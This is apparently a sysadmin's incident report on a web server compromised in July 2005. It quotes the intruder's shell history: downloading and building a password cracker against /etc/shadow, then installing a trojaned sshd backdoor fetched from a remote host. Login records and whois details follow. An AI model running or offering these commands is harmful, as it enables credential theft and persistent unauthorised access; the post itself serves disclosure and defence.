Hi!
One of my web servers was hacked on July 17, 2005. bash_history showed:
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf
john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john
/etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf
sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot
According to john, a couple of users had weak passwords, but root seemed well
protected. From looking in all the bash_history, it appears the hacker came in
from the website account, and did an su from there.
I found this about a month later when I logged into the box, did an ls, only to
be met by a seg fault. A ps x showed mech.tgz trying to be downloaded, and a
bunch of other CRON processes running. The auth log didn't show other logins,
though, so the ssh installed must have logging turned off for the backdoor they
installed.
I filled out an abuse form at geocities for the accounts hosting the software
after downloading the software (I couldn't find the tgz files on my system).
Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47)
website pts/0 193.231.77.74 Sun Jul 17 17:42 - down (00:27)
website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26 (00:20)
website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41 (01:14)
whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA
Best Regards,
Steve
